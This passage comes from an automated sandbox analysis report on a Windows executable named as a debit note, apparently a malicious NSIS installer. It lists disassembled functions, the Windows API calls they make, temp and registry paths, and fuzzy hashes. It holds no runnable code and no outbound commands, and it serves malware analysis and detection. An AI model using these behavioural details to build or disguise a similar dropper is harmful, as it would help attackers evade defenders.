Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsb5059.tmp$C:\Users\user\AppData\Local\Temp\nsb5059.tmp\System.dll$C:\Users\user\brugerlicensaftalerne\Isidora$Call
API String ID: 1941528284-2145328627
Opcode ID: 8fd7ff773941625183321c21c1d438156bd1c93f7609a995d7972b8441070f6c
Instruction ID: 22a22a0f5d261001ccd7191b61e6a6ae22ba545f5f0eb33ed6189b5534195358
Opcode Fuzzy Hash: 8fd7ff773941625183321c21c1d438156bd1c93f7609a995d7972b8441070f6c
Instruction Fuzzy Hash: 3341C071900515BACF11BBB5CC86EAF3679EF06369F20423BF422B10E1C73C8A419A6D

Function 00402573 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(?,?,?,?), ref: 004025DB
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402616
SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402639
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264F

Part of subcall function 00405C37: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B

Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C

Strings

9, xrefs: 004025BE

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: File$ByteCharMultiReadWide$Pointerwsprintf
String ID: 9
API String ID: 1149667376-2366072709
Opcode ID: 14d7a1a443259207830479a75009ee39c6dacd7ae2e8022bb32dc9fb2f0741b6
Instruction ID: 34008a6f5bb5370994306dbe4266d00811a1d2e87b5126a94146f67fdcf6739f
Opcode Fuzzy Hash: 14d7a1a443259207830479a75009ee39c6dacd7ae2e8022bb32dc9fb2f0741b6
Instruction Fuzzy Hash: 0E51E771E04209ABDF24DF94DE88AAEB779FF04304F50443BE511B62D0D7B99A42CB69

Function 004051F2 Relevance: 10.6, APIs: 7, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 241caa620ce1fcc58b3a3595d79cd8debb0f013b3e7c164dabd01d0a25878295
Instruction ID: 09d17c59ce7287a2cbf3dc662f19c44123261f726eb293d34c68041fb2ac0666
Opcode Fuzzy Hash: 241caa620ce1fcc58b3a3595d79cd8debb0f013b3e7c164dabd01d0a25878295
Instruction Fuzzy Hash: CA21A131900558BBCB219FA5DD849DFBFB8EF54310F14807AF904B62A0C3798A81CFA8

Function 00402331 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb5059.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsb5059.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsb5059.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC

Strings

C:\Users\user\AppData\Local\Temp\nsb5059.tmp, xrefs: 00402380, 0040238E, 004023A5, 004023B5, 004023C0

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsb5059.tmp
API String ID: 1356686001-2510104927
Opcode ID: 8805ef30542b3f47b4a39dd0cadf8e155504b39143e93a45ad012f161cb1779c
Instruction ID: 1c964708cf89b7fac74d07524040b6b2ab84de1cfba919da144199f52892a02b
Opcode Fuzzy Hash: 8805ef30542b3f47b4a39dd0cadf8e155504b39143e93a45ad012f161cb1779c
Instruction Fuzzy Hash: A51190B1A00108BEEB11EFA4CD89EAFBB7CEB50358F10443AF505B61D1D7B85E409B29

Function 004015B9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405A3E: CharNextW.USER32(?,?,Antegrade\Fravristelse213.Sto226,?,00405AB2,Antegrade\Fravristelse213.Sto226,Antegrade\Fravristelse213.Sto226,?,?,77222EE0,004057F0,?,C:\Users\user\AppData\Local\Temp\,77222EE0,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"), ref: 00405A4C
Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A51
Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A69

CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\brugerlicensaftalerne\Isidora,?,00000000,000000F0), ref: 00401630

Strings

C:\Users\user\brugerlicensaftalerne\Isidora, xrefs: 00401623

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID: C:\Users\user\brugerlicensaftalerne\Isidora
API String ID: 3751793516-431281164
Opcode ID: 563658752a320469cbbf05847d38c43e8d4ffc81c57abf02e21dc30b2d994902
Instruction ID: 602e027c19ef8137931421d3e2870900c2c1aa36f58208ee64056e3add0ea48c
Opcode Fuzzy Hash: 563658752a320469cbbf05847d38c43e8d4ffc81c57abf02e21dc30b2d994902
Instruction Fuzzy Hash: 4F11C271904200EBCF206FA0CD449AE7AB4FF14369B34463BF881B62E1D23D49419A6E

Function 00402B7A Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402B9B
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
RegCloseKey.ADVAPI32(?), ref: 00402BE0
RegCloseKey.ADVAPI32(?), ref: 00402C05
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: b547f4a97addcc1e8c82d95905b84b8973278d2723117ef79469a300e8f1f4e9
Instruction ID: 39c85bfe7ca74ada2351cc0a51ccebcd1f3e21716521df4e7e96f28c7df0de5f
Opcode Fuzzy Hash: b547f4a97addcc1e8c82d95905b84b8973278d2723117ef79469a300e8f1f4e9
Instruction Fuzzy Hash: 5B116A31904008FEEF229F90DE89EAE3B7DFB14348F100476FA01B00A0D3B59E51EA69

Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D

GlobalFree.KERNEL32(00000000), ref: 10001804
FreeLibrary.KERNEL32(?), ref: 1000187B
GlobalFree.KERNEL32(00000000), ref: 100018A0

Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8

Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7

Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD

Strings

, xrefs: 10001881

Memory Dump Source

Source File: 00000000.00000002.11419527256.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.11419505388.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.11419552183.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.11419574238.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: Global$Free$Alloc$Librarylstrcpy
String ID:
API String ID: 1791698881-3916222277
Opcode ID: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
Opcode Fuzzy Hash: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761

Function 00405E15 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E3F
RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E60
RegCloseKey.KERNELBASE(?,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E83

Strings

Call, xrefs: 00405E18

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Call
API String ID: 3677997916-1824292864
Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
Instruction ID: 600534e839ec184522a2ed62e812a695e1e378dc1a2fe7ff70d8343822b3fb0e
Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
Instruction Fuzzy Hash: A7015A3114020EEACB218F56EC08EEB3BA8EF54390F00413AF944D2220D334DA64CBE5

Function 00405BE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405C01
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403358,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405C1C

Strings

nsa, xrefs: 00405BF0
C:\Users\user\AppData\Local\Temp\, xrefs: 00405BE8, 00405BEC

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-944333549
Opcode ID: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
Instruction ID: 094b443934c56d738417ad06ce23117a41e39d67b54f0ae1535361756efc6c0b
Opcode Fuzzy Hash: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
Instruction Fuzzy Hash: 45F09676A04208BBDB009F59DC05E9BB7B8EB91710F10803AEA01E7151E2B0AD448B54

Function 0040317D Relevance: 6.1, APIs: 4, Instructions: 108fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00403192

Part of subcall function 0040330F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
WriteFile.KERNELBASE(0040BE90,0040C02F,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
SetFilePointer.KERNELBASE(00004D6E,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: File$Pointer$CountTickWrite
String ID:
API String ID: 2146148272-0
Opcode ID: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
Instruction ID: 34320a24581f7621071559271f75aff2a33e70c32c739a51ea230fcf3b1a2f41
Opcode Fuzzy Hash: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
Instruction Fuzzy Hash: CB418B72504205DFDB109F29EE84AA63BADF74431671441BFE604B22E1C7B96D418BEC

Function 00403326 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,77223420,00403542), ref: 0040623F
Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
Part of subcall function 004061DC: CharNextW.USER32(?,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,77223420,00403542), ref: 00406253
Part of subcall function 004061DC: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,77223420,00403542), ref: 00406266

CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77223420,00403542), ref: 00403347

Strings

1033, xrefs: 0040334E
C:\Users\user\AppData\Local\Temp\, xrefs: 00403327, 0040332C, 00403332, 0040333E, 00403346, 0040334D

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID: 1033$C:\Users\user\AppData\Local\Temp\
API String ID: 4115351271-2414109610
Opcode ID: bbd1dcb3637595afbe6b96ae3bcfafd58112e7b3325432cb54e87bfcccc6df60
Instruction ID: 64a45b222adfb8bd76fd8b495f2d7cf88aee328212c381153bc1e0c9699f7593
Opcode Fuzzy Hash: bbd1dcb3637595afbe6b96ae3bcfafd58112e7b3325432cb54e87bfcccc6df60
Instruction Fuzzy Hash: 22D0C92251AA3135C551372A7D06FCF295C8F0A329F12A477F809B90C2CB7C2A8249FE

Function 004069D2 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
Instruction ID: dca007468fed7c27dd914b546e5ea1ac9ab056a0c62ecf1bea7b7831388965f7
Opcode Fuzzy Hash: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
Instruction Fuzzy Hash: 58A14471E00229DBDF28CFA8C8447ADBBB1FF48305F15816AD856BB281C7785A96CF44

Function 00406BD3 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
Instruction ID: e31ab10654d3133c4bbe562e0396aaf9f668a3464ceaf5ac7e335a669e1e1d03
Opcode Fuzzy Hash: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
Instruction Fuzzy Hash: 8E912371E00228CBEF28CF98C8587ADBBB1FF44305F15816AD856BB291C7785A96DF44

Function 004068E9 Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
Instruction ID: e0c60a541a5106e25e0a2f50f35f038ee2aa27f15edb78bccdd8f3c871378321
